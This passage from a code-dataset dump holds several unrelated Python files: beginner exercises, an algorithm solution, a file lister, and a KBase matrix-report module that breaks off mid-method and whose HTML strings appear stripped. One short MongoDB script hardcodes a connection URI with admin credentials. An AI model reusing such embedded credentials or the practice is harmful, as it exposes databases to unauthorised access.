delete_no = int(input(\"삭제 할 번호 입력>>> \"))\n # 목록에서 해당 항목을 삭제한다.\n del pList[delete_no-1];\n print(\"삭제 완료 하였습니다!\")\n elif no == 6 :\n print(\"{:-^50}\".format(\" 종료-굿바이 \"))\n # 반복문을 탈출 하면 프로그램이 종료 된다.\n break\n else :\n print(\"{:-^50}\".format(\" 선택 사항 없슴 \"))\n\n print() #공백 라인 추가\n\n# end of while\nprint(\"다음 기회에 만나요~\")","repo_name":"comstudy21joon/python","sub_path":"ch05_list_for/ch05ex14.py","file_name":"ch05ex14.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24583099143","text":"import sys\nfrom collections import deque\nfrom pprint import pprint\n\ndef find(x):\n if root[x] == x:\n return x\n root[x] = find(root[x])\n return root[x]\n\n\ndef union(x, y):\n x = find(x)\n y = find(y)\n\n if x == y:\n return False\n\n if rank[x] < rank[y]:\n root[x] = y\n else:\n root[y] = x\n if rank[x] == rank[y]:\n rank[x] += 1\n return True\n\n\ndxy = [(-1, 0), (0, 1), (1, 0), (0, -1)]\ninput = sys.stdin.readline\nN, M = map(int, input().split())\ncountry = [list(map(int, input().split())) for _ in range(N)]\nedges = set()\nnum = 2\nfor r in range(N):\n for c in range(M):\n if country[r][c] == 1:\n country[r][c] = num\n queue = deque([(r, c)])\n while queue:\n y, x = queue.popleft()\n for dy, dx in dxy:\n yi = y + dy\n xi = x + dx\n if 0 <= yi < N and 0 <= xi < M and country[yi][xi] == 1:\n country[yi][xi] = num\n queue.append((yi, xi))\n num += 1\n\nroot = [i for i in range(num)]\nrank = [0] * num\nadj = [set() for _ in range(num)]\n\nfor r in range(N):\n c = 0\n cnt = 0\n past = country[r][0]\n while c < M - 1:\n c += 1\n now = country[r][c]\n if not now:\n cnt += 1\n elif now == past and cnt >= 1:\n cnt = 0\n elif now != past:\n if past == 0:\n cnt = 0\n past = now\n else:\n if cnt > 1:\n edges.add((past, now, cnt))\n adj[past].add(now)\n adj[now].add(past)\n past = now\n cnt = 0\n\nfor c in range(M):\n r = 0\n cnt = 0\n past = country[0][c]\n while r < N - 1:\n r += 1\n now = country[r][c]\n if not now:\n cnt += 1\n elif now == past and cnt >= 1:\n cnt = 0\n elif now != past:\n if past == 0:\n cnt = 0\n past = now\n else:\n if cnt > 1:\n edges.add((past, now, cnt))\n adj[past].add(now)\n adj[now].add(past)\n past = now\n cnt = 0\n\ndef chk_bridge():\n global edges\n vis = [False] * num\n stack = deque([2])\n while stack:\n node = stack.pop()\n if not vis[node]:\n vis[node] = True\n stack.extend(adj[node])\n\n if sum(vis) != num - 2:\n return -1\n \n edges = sorted(list(edges), key=lambda x: x[2])\n res = 0\n vis = [False] * num\n vis[0] = vis[1] = True\n for n1, n2, w in edges:\n if w < 2 or (vis[n1] and vis[n2]):\n continue\n if union(n1, n2):\n vis[n1] = True\n vis[n2] = True\n res += w\n\n print(res)\n pprint(country)\n print(edges)\n return res\n \n \n\nres = chk_bridge()\nprint(res)","repo_name":"seoul-ssafy-class-2-studyclub/Indong-python","sub_path":"Python/BOJ/17472_다리 만들기2.py","file_name":"17472_다리 만들기2.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27106862523","text":"from pymongo import MongoClient\nuri = \"mongodb://admin:admin@ds021182.mlab.com:21182/c4e\"\nclient = MongoClient(uri)\ndb = client.get_database()\npost_collection = db[\"post\"]\nnew_document ={\n \"title\":\"???\",\n \"authur\": \"HOÀNG\",\n \"content\":\"J'amie la salle de classe\"\n}\npost_collection.insert_one(new_document)\nclient.close()","repo_name":"nmhoangg2000/lab-c4e24","sub_path":"lab1/homework/se23.py","file_name":"se23.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36297979331","text":"# -*- coding: utf-8 -*-\r\n__author__ = 'yunge'\r\n\r\n'''\r\nMerge two given sorted integer array A and B into a new sorted integer array.\r\n\r\n\r\nExample\r\nA=[1,2,3,4]\r\nB=[2,4,5,6]\r\nreturn [1,2,2,3,4,4,5,6]\r\n\r\nChallenge\r\nHow can you optimize your algorithm if one array is very large and the other is very small?\r\n'''\r\n\r\ndef mergeSortedArray(A, B):\r\n i = j = 0\r\n C = []\r\n while i + j <= len(A) + len(B):\r\n if i == len(A):\r\n C += B[j:]\r\n break\r\n elif j == len(B):\r\n C += A[i:]\r\n break\r\n elif A[i] < B[j]:\r\n C.append(A[i])\r\n i += 1\r\n else:\r\n C.append(B[j])\r\n j += 1\r\n return C\r\n\r\n\r\nA=[1]\r\nB=[1]\r\nprint(mergeSortedArray(A, B))","repo_name":"yunge008/LintCode","sub_path":"2.IntegerArray/[E]Merge Sorted Array II.py","file_name":"[E]Merge Sorted Array II.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21547695207","text":"import os \n\ndef get_list(dir,filelist):\n next_dir=dir\n if(os.path.isfile(dir)): #判断该名是否为文件\n if('_gt.json' in dir):\n filelist.append(dir)\n elif os.path.isdir(dir): #判断是否为文件夹\n for f in os.listdir(dir): #依次读取当前路径下所有文件名\n next_dir=os.path.join(dir,f) #将文件名添加到当前路径后\n get_list(next_dir,filelist) #迭代\n return filelist\n\nif __name__==\"__main__\":\n start_dir=input(\"请输入目标路径:\")\n res_list=get_list(start_dir,[])\n print(len(res_list))\n for name in res_list:\n print(name)\n ","repo_name":"kam1noki/Stat_json","sub_path":"Stat_json.py","file_name":"Stat_json.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16961444266","text":"import collections\nimport errno\nimport logging\nimport os\nimport re\nimport shutil\nimport uuid\nimport time\nimport csv\n\nimport pandas as pd\nimport numpy as np\nfrom openpyxl import load_workbook\nfrom xlrd.biffh import XLRDError\nfrom sklearn import preprocessing\nfrom skbio.stats.composition import ilr, clr\nfrom skbio import DistanceMatrix\nfrom skbio.stats.distance import anosim, permanova, permdisp, pwmantel\nimport scipy.spatial.distance as dist\nfrom scipy.cluster.hierarchy import dendrogram, linkage\nfrom scipy.spatial.distance import pdist\nimport rpy2.robjects.packages as rpackages\nimport rpy2.robjects as ro\nfrom rpy2.robjects import pandas2ri, numpy2ri\nfrom rpy2.robjects.conversion import localconverter\nimport plotly.graph_objects as go\nfrom plotly.offline import plot\nimport plotly.express as px\n\nfrom installed_clients.DataFileUtilClient import DataFileUtil\nfrom GenericsAPI.Utils.AttributeUtils import AttributesUtil\nfrom GenericsAPI.Utils.SampleServiceUtil import SampleServiceUtil\nfrom GenericsAPI.Utils.DataUtil import DataUtil\nimport GenericsAPI.Utils.MatrixValidation as vd\nfrom installed_clients.KBaseReportClient import KBaseReport\nfrom installed_clients.fba_toolsClient import fba_tools\nfrom installed_clients.kb_GenericsReportClient import kb_GenericsReport\nfrom installed_clients.SampleServiceClient import SampleService\n\nTYPE_ATTRIBUTES = {'description', 'scale', 'row_normalization', 'col_normalization'}\nSCALE_TYPES = {'raw', 'ln', 'log2', 'log10'}\nRANKS = ['Domain', 'Phylum', 'Class', 'Order', 'Family', 'Genus']\n\n\nclass MatrixUtil:\n\n def _validate_import_matrix_from_excel_params(self, params):\n \"\"\"\n _validate_import_matrix_from_excel_params:\n validates params passed to import_matrix_from_excel method\n \"\"\"\n logging.info('start validating import_matrix_from_excel params')\n\n # check for required parameters\n for p in ['obj_type', 'matrix_name', 'workspace_name', 'scale']:\n if p not in params:\n raise ValueError('\"{}\" parameter is required, but missing'.format(p))\n\n obj_type = params.get('obj_type')\n if obj_type not in self.matrix_types:\n raise ValueError('Unknown matrix object type: {}'.format(obj_type))\n\n scale = params.get('scale')\n if scale not in SCALE_TYPES:\n raise ValueError('Unknown scale type: {}'.format(scale))\n\n if params.get('input_file_path'):\n file_path = params.get('input_file_path')\n elif params.get('input_shock_id'):\n file_path = self.dfu.shock_to_file(\n {'shock_id': params['input_shock_id'],\n 'file_path': self.scratch}).get('file_path')\n elif params.get('input_staging_file_path'):\n file_path = self.dfu.download_staging_file(\n {'staging_file_subdir_path': params.get('input_staging_file_path')}\n ).get('copy_file_path')\n else:\n error_msg = \"Must supply either a input_shock_id or input_file_path \"\n error_msg += \"or input_staging_file_path\"\n raise ValueError(error_msg)\n\n refs = {k: v for k, v in params.items() if \"_ref\" in k}\n\n return (obj_type, file_path, params.get('workspace_name'),\n params.get('matrix_name'), refs, scale)\n\n def _upload_to_shock(self, file_path):\n \"\"\"\n _upload_to_shock: upload target file to shock using DataFileUtil\n \"\"\"\n logging.info('Start uploading file to shock: {}'.format(file_path))\n\n file_to_shock_params = {\n 'file_path': file_path,\n 'pack': 'zip'\n }\n shock_id = self.dfu.file_to_shock(file_to_shock_params).get('shock_id')\n\n return shock_id\n\n @staticmethod\n def _mkdir_p(path):\n \"\"\"\n _mkdir_p: make directory for given path\n \"\"\"\n if not path:\n return\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n @staticmethod\n def _find_between(s, start, end):\n \"\"\"\n _find_between: find string in between start and end\n \"\"\"\n\n return re.search('{}(.*){}'.format(start, end), s).group(1)\n\n @staticmethod\n def _write_mapping_sheet(file_path, sheet_name, mapping, index):\n \"\"\"\n _write_mapping_sheet: write mapping to sheet\n \"\"\"\n df_dict = collections.OrderedDict()\n\n df_dict[index[0]] = []\n df_dict[index[1]] = []\n\n for key, value in mapping.items():\n df_dict.get(index[0]).append(key)\n df_dict.get(index[1]).append(value)\n\n df = pd.DataFrame.from_dict(df_dict)\n\n with pd.ExcelWriter(file_path, engine='openpyxl') as writer:\n writer.book = load_workbook(file_path)\n df.to_excel(writer, sheet_name=sheet_name)\n\n def _generate_tab_content(self, index_page, viewer_name):\n tab_content = ''\n\n if index_page:\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '\\n\\n

      \\n'\n\n tab_content += '\\n
      \\n'\n\n return tab_content\n\n def _generate_simper_visualization_content(self, simper_ret, simper_sum,\n species_stats, grouping_names, output_directory):\n tab_def_content = ''\n tab_content = ''\n\n viewer_name = 'simper_plot'\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_simper_plot_content(viewer_name, species_stats,\n grouping_names, output_directory)\n\n viewer_name = 'simper_ret'\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_simper_tab_content(simper_ret, viewer_name)\n\n viewer_name = 'simper_sum'\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_simper_tab_content(simper_sum, viewer_name)\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _generate_variable_stats_visualization_content(self, anosim_res,\n permanova_res, permdisp_res):\n tab_def_content = ''\n tab_content = ''\n\n first_tab_token = False\n\n if anosim_res is not None:\n viewer_name = 'anosim_res'\n\n first_tab_token = True\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_variable_stat_tab_content(anosim_res, viewer_name)\n\n if permanova_res is not None:\n\n viewer_name = 'permanova_res'\n\n if first_tab_token:\n tab_def_content += '''\\n\\n'''\n else:\n first_tab_token = True\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_variable_stat_tab_content(permanova_res, viewer_name)\n\n if permdisp_res is not None:\n viewer_name = 'permdisp_res'\n\n if first_tab_token:\n tab_def_content += '''\\n\\n'''\n else:\n # first_tab_token = True\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_variable_stat_tab_content(permdisp_res, viewer_name)\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _generate_rarefy_visualization_content(self, output_directory,\n rarefied_matrix_dir, rarecurve_image,\n obs_vs_rare_image, random_rare_df):\n tab_def_content = ''\n tab_content = ''\n\n row_data_summary = random_rare_df.T.describe().round(2).to_string()\n col_data_summary = random_rare_df.describe().round(2).to_string()\n\n tab_def_content = ''\n tab_content = ''\n\n viewer_name = 'data_summary'\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(\n viewer_name)\n tab_content += '''\\n
      Rarefied Matrix Size: {} x {}
      '''.format(\n len(random_rare_df.index),\n len(random_rare_df.columns))\n tab_content += '''\\n
      Row Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(row_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      Column Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(col_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '\\n
      \\n'\n\n viewer_name = 'RarefiedMatrixViewer'\n tab_def_content += '''\\n\\n'''\n rarefied_matrix_report_files = os.listdir(rarefied_matrix_dir)\n rarefied_matrix_index_page = None\n for rarefied_matrix_report_file in rarefied_matrix_report_files:\n if rarefied_matrix_report_file.endswith('.html'):\n rarefied_matrix_index_page = rarefied_matrix_report_file\n\n shutil.copy2(os.path.join(rarefied_matrix_dir, rarefied_matrix_report_file),\n output_directory)\n tab_content += self._generate_tab_content(rarefied_matrix_index_page, viewer_name)\n\n rarecurve_image_name = os.path.basename(rarecurve_image)\n shutil.copy2(rarecurve_image,\n os.path.join(output_directory, rarecurve_image_name))\n\n obs_vs_rare_image_name = os.path.basename(obs_vs_rare_image)\n shutil.copy2(obs_vs_rare_image,\n os.path.join(output_directory, obs_vs_rare_image_name))\n\n viewer_name = 'RarecurvePlot'\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '''\\n\\n'''\n tab_content += '''
      \\n
      \\n'''\n tab_content += '''\\n\\n'''\n tab_content += '\\n
      \\n'\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _generate_trans_visualization_content(self, output_directory,\n operations, heatmap_html_dir_l,\n transformed_matrix_df, variable_specific):\n row_data_summary = transformed_matrix_df.T.describe().round(2).to_string()\n col_data_summary = transformed_matrix_df.describe().round(2).to_string()\n\n tab_def_content = ''\n tab_content = ''\n\n op_2_name = {\n 'abundance_filtering': 'Filtered',\n 'ubiquity_filtering': 'Filtered',\n 'standardization': 'Standardized',\n 'ratio_transformation': 'Log Ratio Transformed',\n 'relative_abundance': 'Relative Abundance',\n 'logit': 'Logit',\n 'sqrt': 'Square Root',\n 'log': 'Log',\n 'normalization': 'Normalized',\n }\n\n ## Start tabs ##\n tab_def_content += '''\\n
      \\n'''\n\n ## Operations tabs ##\n for i, (op, heatmap_html_dir) in enumerate(zip(operations, heatmap_html_dir_l)):\n viewer_name = 'op%s_%s' % (i, op)\n tab_def_content += '''\\n\\n''' % (i+1, op_2_name[op])\n\n flnms = os.listdir(heatmap_html_dir)\n heatmap_html_flnm = None\n for flnm in flnms:\n if flnm.endswith('.html'):\n heatmap_html_flnm = flnm\n\n shutil.copy2(os.path.join(heatmap_html_dir, flnm), output_directory)\n tab_content += self._generate_tab_content(heatmap_html_flnm, viewer_name)\n\n ## Transformed matrix statistics tab ##\n viewer_name = 'data_summary'\n tab_def_content += '''\\n\\n'''\n else:\n tab_def_content += '''>Transformed Matrix Statistics\\n'''\n tab_content += '''\\n
      '''.format(\n viewer_name)\n if variable_specific:\n tab_content += '''\\n
      Transformed Selected Variables Size: {} x {}
      '''.format(\n len(transformed_matrix_df.index),\n len(transformed_matrix_df.columns))\n else:\n tab_content += '''\\n
      Transformed Matrix Size: {} x {}
      '''.format(\n len(transformed_matrix_df.index),\n len(transformed_matrix_df.columns))\n tab_content += '''\\n
      Row Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(row_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      Column Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(col_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '\\n
      \\n'\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _create_chem_abun_heatmap(self, output_directory, data_groups):\n\n data_df = pd.concat(data_groups.values())\n\n col_ordered_label = self._compute_cluster_label_order(data_df.T.values.tolist(),\n data_df.T.index.tolist())\n data_df = data_df.reindex(columns=col_ordered_label)\n\n data_label_groups_pos = dict()\n\n for group_name, data_group_df in data_groups.items():\n if pd.isna(group_name[1]):\n label_name = group_name[0]\n else:\n label_name = '{} ({})'.format(group_name[0], group_name[1])\n\n data_label_groups_pos[label_name] = [\n data_df.index.to_list().index(data_id) for data_id in data_group_df.index]\n\n heatmap_file_name = 'chem_abun_heatmap_{}.html'.format(str(uuid.uuid4()))\n heatmap_path = os.path.join(output_directory, heatmap_file_name)\n\n colors = px.colors.sequential.OrRd\n colorscale = [[0, colors[1]], # 0\n [1./10000, colors[2]], # 10\n [1./1000, colors[3]], # 100\n [1./100, colors[4]], # 1000\n [1./10, colors[5]], # 10000\n [1., colors[6]]]\n\n layout = go.Layout(xaxis={'type': 'category'},\n yaxis={'type': 'category'})\n\n fig = go.Figure(data=go.Heatmap(\n z=data_df.values,\n x=data_df.columns,\n y=data_df.index,\n hoverongaps=False,\n coloraxis='coloraxis'), layout=layout)\n\n width = max(15 * data_df.columns.size, 1400)\n height = max(10 * data_df.index.size, 1000)\n fig.update_layout(coloraxis=dict(colorscale=colorscale),\n plot_bgcolor='rgba(0,0,0,0)',\n autosize=True,\n width=width,\n height=height,\n xaxis=dict(tickangle=45,\n automargin=True,\n tickfont=dict(color='black', size=8)),\n yaxis=dict(automargin=True,\n tickfont=dict(color='black', size=8)))\n\n colors = px.colors.qualitative.Bold\n chemical_types = ['aggregate', 'exometabolite', 'specific']\n text_height = 0\n col_size = width / data_df.columns.size\n label_pos = 70 / col_size\n if len(data_label_groups_pos) > 1:\n for i, label_name in enumerate(data_label_groups_pos):\n data_label_idx = data_label_groups_pos[label_name]\n chemical_type = label_name.split(' ')[0]\n if i == 0:\n fig.update_layout(yaxis=dict(range=[0, data_df.index.size-1],\n tickvals=data_label_idx,\n automargin=True,\n tickfont=dict(\n color=colors[chemical_types.index(chemical_type)],\n size=8)))\n\n text_height += len(data_label_idx) - 1\n fig.add_annotation(x=label_pos, y=0.5,\n ax=label_pos, ay=text_height,\n text=label_name,\n showarrow=True,\n xref=\"x\", yref=\"y\",\n axref=\"x\", ayref=\"y\",\n arrowside='start',\n # arrowwidth=1.5,\n font=dict(color=colors[chemical_types.index(chemical_type)],\n size=8))\n else:\n fig.add_trace(dict(yaxis='y{}'.format(i + 1)))\n fig.update_layout({'yaxis{}'.format(i + 1): dict(\n range=[0, data_df.index.size-1],\n tickvals=data_label_idx,\n ticktext=[data_df.index[i] for i in data_label_idx],\n tickfont=dict(color=colors[chemical_types.index(chemical_type)], size=8),\n automargin=True,\n overlaying='y')})\n text_height += len(data_label_idx)\n fig.add_annotation(x=label_pos, y=text_height - len(data_label_idx) + 1,\n ax=label_pos, ay=text_height,\n text=label_name,\n showarrow=True,\n xref=\"x\", yref=\"y\",\n axref=\"x\", ayref=\"y\",\n arrowside='start',\n # arrowwidth=1.5,\n font=dict(color=colors[chemical_types.index(chemical_type)],\n size=8))\n\n plot(fig, filename=heatmap_path)\n\n return heatmap_file_name\n\n def _generate_chem_visualization_content(self, output_directory, data_groups):\n tab_def_content = ''\n tab_content = ''\n\n viewer_name = 'data_summary'\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(\n viewer_name)\n\n chemical_types = list(data_groups.keys())\n chemical_types = ['{} ({})'.format(item[0], item[1]) for item in chemical_types]\n type_text = 'Chemical Type' if len(chemical_types) == 1 else 'Chemical Types'\n tab_content += '''\\n
      {}: {}
      '''.format(type_text,\n ', '.join(chemical_types))\n\n for chemical_type, data_df in data_groups.items():\n chemical_type = '{} ({})'.format(chemical_type[0], chemical_type[1])\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n row_data_summary = data_df.T.describe().round(2).to_string()\n col_data_summary = data_df.describe().round(2).to_string()\n tab_content += '''\\n
      {} Chemical Matrix Size: {} x {}
      '''.format(\n chemical_type[0].upper() + chemical_type[1:],\n len(data_df.index),\n len(data_df.columns))\n tab_content += '''\\n
      {} Row Aggregating Statistics
      '''.format(\n chemical_type[0].upper() + chemical_type[1:])\n html = '''\\n
      ''' + \\\n                str(row_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '''\\n
      {} Column Aggregating Statistics
      '''.format(\n chemical_type[0].upper() + chemical_type[1:])\n html = '''\\n
      ''' + \\\n                str(col_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '\\n
      \\n'\n\n heatmap_index_page = self._create_chem_abun_heatmap(output_directory, data_groups)\n viewer_name = 'MatrixHeatmapViewer'\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '\\n'\n tab_content += '\\n
      \\n'\n else:\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '''\\n

      '''\n tab_content += '''Heatmap is too large to be displayed.

      \\n'''\n tab_content += '\\n
      \\n'\n\n viewer_name = 'MatrixHeatmapViewer'\n tab_def_content += '''\\n\\n'''\n\n heatmap_report_files = os.listdir(heatmap_dir)\n\n heatmap_index_page = None\n for heatmap_report_file in heatmap_report_files:\n if heatmap_report_file.endswith('.html'):\n heatmap_index_page = heatmap_report_file\n\n shutil.copy2(os.path.join(heatmap_dir, heatmap_report_file),\n output_directory)\n\n if heatmap_index_page:\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '\\n